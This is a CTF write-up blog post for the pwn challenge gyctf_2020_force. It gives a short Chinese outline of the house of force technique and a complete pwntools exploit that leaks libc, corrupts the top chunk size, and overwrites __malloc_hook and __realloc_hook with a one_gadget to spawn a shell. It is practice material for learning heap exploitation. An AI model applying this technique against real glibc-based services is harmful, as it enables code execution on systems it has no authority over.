gyctf_2020_force

gyctf_2020_force

house of force,realloc 调整栈帧

# 思路

house of force：先 malloc 一个超大 chunk（走 mmap，紧贴 libc 映射）泄露 libc 基址；再利用堆溢出把 top chunk 的 size 改成 -1，用一次精心计算大小的分配把 top chunk 抬到 `__malloc_hook` 附近；随后一次分配同时写入 `__realloc_hook = one_gadget`、`__malloc_hook = realloc+0x10`（借 realloc 开头的 push 调整栈帧，满足 one_gadget 的栈约束）；最后再 malloc 一次触发 hook 链拿 shell。注意 one_gadget 偏移与泄露用的 0x200ff0 偏移都只对题目给的 libc-2.23 有效。

# EXP

from pwn import *

# Target tube: local process by default; flip REMOTE to hit the BUU instance.
REMOTE = False
if REMOTE:
    r = remote("node4.buuoj.cn", 26964)
else:
    r = process("./gyctf_2020_force")

# Verbose tube logging so every send/recv is visible while tuning offsets.
context.log_level = 'debug'

elf = ELF("./gyctf_2020_force")
libc = ELF('./libc-2.23.so')

# one_gadget candidates for the bundled libc-2.23.so (presumably Ubuntu 16.04's,
# hence the `_16` suffix — confirm with `one_gadget libc-2.23.so` if the libc
# changes). The exploit uses index 1 (0x4526a).
one_gadget_16 = [0x45216, 0x4526a, 0xf02a4, 0xf1147]

def add(size, content):
    """Menu option 1: request ``size`` bytes, fill them with ``content``.

    Drives the target over the module-level tube ``r``: waits for the menu
    (its last line ends in ``2:puts``), picks ``1``, answers the ``size``
    prompt, parses the hex address the binary echoes after ``bin addr ``,
    then answers the ``content`` prompt with ``content`` exactly as given
    (``send``, not ``sendline`` — the caller controls every byte written,
    which matters for the overflow payloads below).

    Returns the parsed chunk address as an int.
    """
    r.recvuntil("2:puts\n")
    r.sendline('1')
    r.recvuntil("size\n")
    r.sendline(str(size))
    r.recvuntil("bin addr ")
    addr_text = r.recvuntil('\n').strip()
    chunk_addr = int(addr_text, 16)
    r.recvuntil("content\n")
    r.send(content)
    return chunk_addr


def show(index):
    """Menu option 2 (``puts``): select it on the module-level tube ``r``.

    ``index`` is accepted but never sent — this helper only chooses the menu
    entry. It is not called anywhere in the exploit; it exists for manual
    poking at the binary.
    """
    r.recvuntil("2:puts\n")
    r.sendline('2')

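# ---- 1. libc leak ----------------------------------------------------------
# A 0x200000-byte request is far above the mmap threshold, so malloc serves it
# from a fresh mmap() region that lands directly below the libc mapping; the
# address the binary echoes plus 0x200ff0 is the libc base. That constant is
# tied to this binary/libc pair and the process's mapping layout.
# Byte literals are used throughout so the script runs under both Python 2
# and Python 3 pwntools (str + p64() bytes is a TypeError on 3).
libc.address = add(0x200000, b'chunk0\n') + 0x200ff0
success('libc_base' + hex(libc.address))
if libc.address & 0xfff:
    # A non page-aligned "base" means the leak offset is wrong for this
    # environment; stop before writing garbage hook addresses into the heap.
    log.error("libc base %#x is not page aligned - leak offset is off" % libc.address)

# ---- 2. House of Force: corrupt the top chunk size -------------------------
# A 0x18 request gives a 0x20 chunk, so the top chunk header starts 0x10 bytes
# into the user region. The payload spills 8 bytes past the request: 0x10
# bytes of filler, then prev_size (0) and size (-1) of the top chunk. With an
# "infinite" top chunk malloc will happily carve any size out of it.
heap_addr = add(0x18, b'a' * 0x10 + p64(0) + p64(0xFFFFFFFFFFFFFFFF))
success("heap_addr:" + hex(heap_addr))

top = heap_addr + 0x10  # address of the (now unbounded) top chunk header
# gdb.attach(r)  # uncomment to inspect the heap right after the top-size overwrite

# ---- 3. Targets ------------------------------------------------------------
malloc_hook = libc.sym['__malloc_hook']
realloc_hook = libc.sym['__realloc_hook']
success("malloc_hook" + hex(malloc_hook))
one_gadget = one_gadget_16[1] + libc.address
realloc = libc.sym["__libc_realloc"]
offset = malloc_hook - top  # distance from the top chunk to __malloc_hook
system = libc.sym['system']
bin_sh = next(libc.search(b'/bin/sh'))  # informational only; not used by the chain
success("system:" + hex(system))
success("bin_sh" + hex(bin_sh))

# The write in step 4 puts one_gadget at malloc_hook-8 on the assumption that
# this is __realloc_hook (true for this glibc 2.23). Verify instead of trusting.
if realloc_hook != malloc_hook - 8:
    log.error("unexpected hook layout: __realloc_hook=%#x __malloc_hook=%#x"
              % (realloc_hook, malloc_hook))
# This script only handles the usual heap-below-libc layout; a negative offset
# would need the wrap-around variant of the technique.
if offset <= 0:
    log.error("__malloc_hook (%#x) is not above top (%#x)" % (malloc_hook, top))

# ---- 4. Walk top chunk up to the hooks and overwrite them ------------------
# Requesting offset-0x30 bytes carves a chunk of offset-0x20 (header included),
# so the new top chunk sits at malloc_hook-0x20. The following 0x10 request is
# then served from malloc_hook-0x20, with its user data at malloc_hook-0x10.
add(offset - 0x30, b'aaa\n')
# Bytes written starting at malloc_hook-0x10:
#   [-0x10] 8 bytes padding
#   [-0x08] __realloc_hook = one_gadget
#   [+0x00] __malloc_hook  = realloc+0x10
# Chain: malloc -> __malloc_hook -> realloc+0x10 -> __realloc_hook -> one_gadget.
# Entering realloc 0x10 bytes in skips part of its prologue pushes, which
# reshapes the stack so the one_gadget constraint is met (the "realloc 调整
# 栈帧" trick from the title); the +0x10 is tuned for this libc.
add(0x10, b'a' * 8 + p64(one_gadget) + p64(realloc + 0x10))

# ---- 5. Trigger ------------------------------------------------------------
# Any further malloc fires the hook chain; the binary never reaches its
# "content" prompt because the shell pops inside malloc, so only the size is sent.
r.recvuntil("2:puts\n")
r.sendline('1')
r.recvuntil("size\n")
r.sendline(str(20))

r.interactive()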

Author

y1seco

Posted on

2022-02-27

Updated on

2022-02-27
